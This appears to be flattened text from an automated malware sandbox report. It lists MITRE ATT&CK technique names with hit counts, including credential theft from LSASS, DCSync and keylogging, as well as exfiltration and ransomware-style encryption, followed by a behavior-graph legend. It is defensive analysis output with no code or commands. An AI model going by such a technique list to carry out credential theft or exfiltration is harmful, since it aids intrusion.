            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection            		1
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation            		NTDS1
            System Network Configuration Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection            		LSA Secrets3
            File and Directory Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials215
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.